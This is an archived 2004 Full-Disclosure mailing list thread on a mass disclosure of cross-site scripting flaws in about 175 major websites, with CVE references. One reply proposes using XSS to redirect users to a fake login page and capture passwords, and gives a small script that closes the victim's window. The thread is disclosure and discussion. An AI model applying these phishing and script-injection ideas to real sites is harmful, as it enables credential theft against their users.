lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <001101c4e9c8$5a644bf0$0100a8c0@grotedoos>
From: skylined at edup.tudelft.nl (Berend-Jan Wever)
Subject: Cross-Site Scripting - an industry-wide problem

I looked at XSS in mayor websites in 2002 and found most of them vulnerable then, I reported it to them and full-disclosure. Apparently nothing's changed: either it is not an issue or not enough of an issue for them to spend money on.

I wrote two short papers on XSS, they can be found here:
http://www.edup.tudelft.nl/~bjwever/whitepaper_xss.html
http://www.edup.tudelft.nl/~bjwever/whitepaper_xss2.html

Cheers,

Berend-Jan Wever
SMTP: <skylined@...p.tudelft.nl>
HTTP: http://www.edup.tudelft.nl/~bjwever
MSN: Skylined@...p.tudelft.nl
IRC: SkyLined in #SkyLined on EFNET
PGP: key ID 0x48479882

----- Original Message ----- 
From: "morning_wood" <se_cur_ity@...mail.com>
To: "mikx" <mikx@...x.de>; <full-disclosure@...ts.netsys.com>; <bugtraq@...urityfocus.com>; <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>
Sent: Friday, December 24, 2004 07:42
Subject: Re: [Full-Disclosure] Cross-Site Scripting - an industry-wide problem


> quite commom, funny because xss can be used in PHISHING attacks.
> instead of <alert blah> try some html redirects to a hosted site with a fake
> login
> spoofing the original content ( a login page ) and capture username/password
> then pass them to the real login page.
> or better yet... xss dos attacks, like.
> [script]
> alert("oh no")
> ;window.close()
> [/script]
> 
> but i guess xss is just kiddi play... or is it?
> 
> m.w
> 
> 
> > Cross-Site Scripting - an industry-wide problem
> > ===============================================
> >
> > In early december i started a series of tests to find Cross-Site Scripting
> > (XSS) vulnerabilities. It quickly turned out that the majority of all
> major
> > websites suffer some kind of XSS. This is a disclosure of 175
> > vulnerabilities at once. Enjoy the ride...
> >
> > Test scenario
> > =============
> >
> > A site was considered affected if it is possible to inject a javascript
> into
> > the output page by making a browser GET or POST request to the webserver.
> As
> > a proof-of-concept the script "alert(document.cookie)" got used.
> >
> > All tests were made on a fully patched WinXP SP2 machine and Internet
> > Explorer 6. Most of the proof-of-concept links in this report will not
> work
> > using another browser, mainly because in many cases i used javascript in
> > styles which isn't supported by browsers like Firefox and because Firefox
> > automaticly applies character encoding to a URL. I was just too lazy to
> test
> > each issue cross-browser, so this doesn't mean automaticly that Internet
> > Explorer is more vulnerable to XSS.
> >
> > Impact
> > ======
> >
> > In many cases XSS is reduced to the attack of stealing session cookies,
> but
> > XSS can be used to do a lot more things. Using DOM manipulation you can
> > change the target of a login form or fake one, change download links or
> > simply insert your own content into a website. As part of mass-mailings
> this
> > can be used for login data phishing, spreading of malware or distribution
> of
> > false news that seem to come from a trustworthy source (which is an
> > intresting option for daytraders on penny stocks for example).
> >
> > Don't forget that the injected script is running in the security context
> of
> > the affected site. If you know who you are attacking and that the victim
> has
> > the affected site in a special trusted zone it can be possible to execute
> > "not safe for scripting" ActiveX controls - giving you more or less total
> > control. In intranets and for extranet web applications this is a not so
> > uncommon configuration.
> >
> > For sure XSS is nothing compared to a remote buffer overflow. But only
> > because this "worst case scenario" is happening quite often these days, it
> > does not mean XSS is not a security issue. XSS flaws are easy to find and
> > spammers are always searching for new stuff.
> >
> > Finally for some sites on the list dedicated to security a XSS flaw is
> just
> > an embarrassing thing ;)
> >
> > Affected sites
> > ==============
> >
> > This list is reduced to the second-level domain for readability and
> posting
> > size. This isn't always fair since sometimes a sub-domain is indepentend
> > from the SLD. Please download the complete list of proof-of-concept links
> > from http://www.mikx.de/xss.php.
> >
> > All webmasters were informed by an email and/or their website feedback
> forms
> > during december, to give them a fair chance to react. Some of them replied
> > really quick and patched the issue in a few hours, others (sadly a lot)
> > never replied. If you are responsible for one of the affected sites and
> you
> > have not been informed or are not able to reproduce the issue, please
> don't
> > hesitate to contact me.
> >
> > The sites in the tests were picked at random from international and german
> > major websites and/or sites related to security/computers. I just tested
> > what came to my head - so there is no "hidden message":
> >
> > about.com, activestate.com, adobe.com, altavista.com, amazon.com, amd.com,
> > annoyances.org, aol.com, apache.org, apple.com , archive.org, arcor.de,
> > ask.com, ati.com, bahn.de, bitdefender.de, blizzard.com, blogdex.net,
> > blogger.com, bloogz.com, ca.com, ccc.de, cdu.de, chip.de, ciao.de,
> cert.org,
> > chillingeffects.org, cnn.com, comdirect.de, consors.de, csialliance.org,
> > csu.de, dell.com, daypop.com, divx.com, dooyoo.de, doubleclick.com,
> > download.com, easycredit.de, ebay.com, etrade.com, evite.com, excite.com,
> > fedex.com, fimatex.de, flexwiki.com, fool.com, free-av.de, freshmeat.net,
> > fsf.org, fujitsu.com, gamestar.de, gm.com, gmx.net, gnu.org, go.com,
> > golem.de, google.com, groupee.com, gruene-partei.de, guenstiger.de,
> > heise.de, hosting.com, hp.com, ibm.com, icq.com, idealo.de,
> imagemagick.org,
> > infineon.com, informationsecurityireland.com, infospace.com, intel.com,
> > itaa.org, izb.de, jamba.de , juno.com, kde.org, kelkoo.de, kerio.com,
> > liberale.de, linspire.com, looksmart.com, lufthansa.com, lycos.com,
> > macromedia.com, mandrakesoft.com, mayflower.de, mcafee.com, meetup.com,
> > messagelabs.com, metacrawler.com, metadot.com, microsoft.com, mlb.com,
> > mnogosearch.org, modblog.com, modssl.org, mozilla.org, mozillazine.org,
> > msdn.com, msn.com, msnbc.com, nasa.gov, nationalgeographic.com, nba.com,
> > netiq.com, nfl.com, netflix.com, netscape.com, nokia.com, novell.com,
> > nytimes.com, onlinekosten.de, opencores.org, openssl.org, opera.com,
> > oracle.com, paypal.com, pc-magazin.de, pcpowerplay.de, pcwelt.de,
> > phpcenter.de, pmwiki.org, privacy.org, pro7.de, ptb.de, postgresql.org,
> > quoka.de, reactos.com, real.com, redhat.com, redvsblue.com, riaa.com,
> > rtl.de, ryanair.com, sans.org, sbroker.de, securityfocus.com,
> > securityspace.com, shutterfly.com, slashdot.org, snocap.com, sony.com,
> > sourceforge.net, sparkasse.de, spd.de, spreadfirefox.com, squid-cache.org,
> > sqlite.org, staysafeonline.com, stern.de, strato.de, sun.com, suse.de,
> > technorati.com, telekombusiness.de, theonion.com, tiscali.com,
> > tomshardware.com, uci.edu , ups.com , upside.de, us-cert.gov,
> validome.org,
> > varbusiness.com, vasoftware.com, viruslist.com, w3.org, web.de,
> > worldofwarcraft.com, wsj.com, xoom.com, yahoo.com, yopi.de, zonelabs.com
> >
> > References
> > ==========
> >
> > It turned out that in some cases third party software used on the websites
> > are suffering a bug. Here the Common Vulnerabilities and Exposures
> > (cve.mitre.org) names:
> >
> > CAN-2004-1059 mnogosearch (as used at www.redhat.com)
> > CAN-2004-1061 bugzilla (as used at bugzilla.mozilla.org bug #272620)
> > CAN-2004-1062 viewcvs (as used at cvs.apache.org)
> > CAN-2004-1146 cvstrac (as used at cvs.openssl.org)
> >
> > http://www.slashcode.com/article.pl?sid=04/12/15/1540200
> > http://www.mnogosearch.com/winhistory.html
> >
> > Credits
> > =======
> >
> > I woud like to thank a few people for helping me out through the tests and
> > working on fixing the issues as quickly as possible:
> >
> > Christoph "Locke" Wehrmann (for making me addicted to XSS)
> > Mark J Cox (Red Hat Security Response Team)
> > Daniel Bachfeld (heisec)
> > Jamie McCarthy and Chris Nandor (slashcode)
> > Alexander Barkov (mnogosearch)
> > Microsoft Security Response Center
> > Google Security Team
> > Bugzilla Team
> > Everybody who responded to my report mail :)
> >
> > Contact
> > =======
> >
> > Michael Krax <mikx@...x.de>
> > http://www.mikx.de/
> >
> >
> > Happy Holidays!
> > mikx
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> 




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ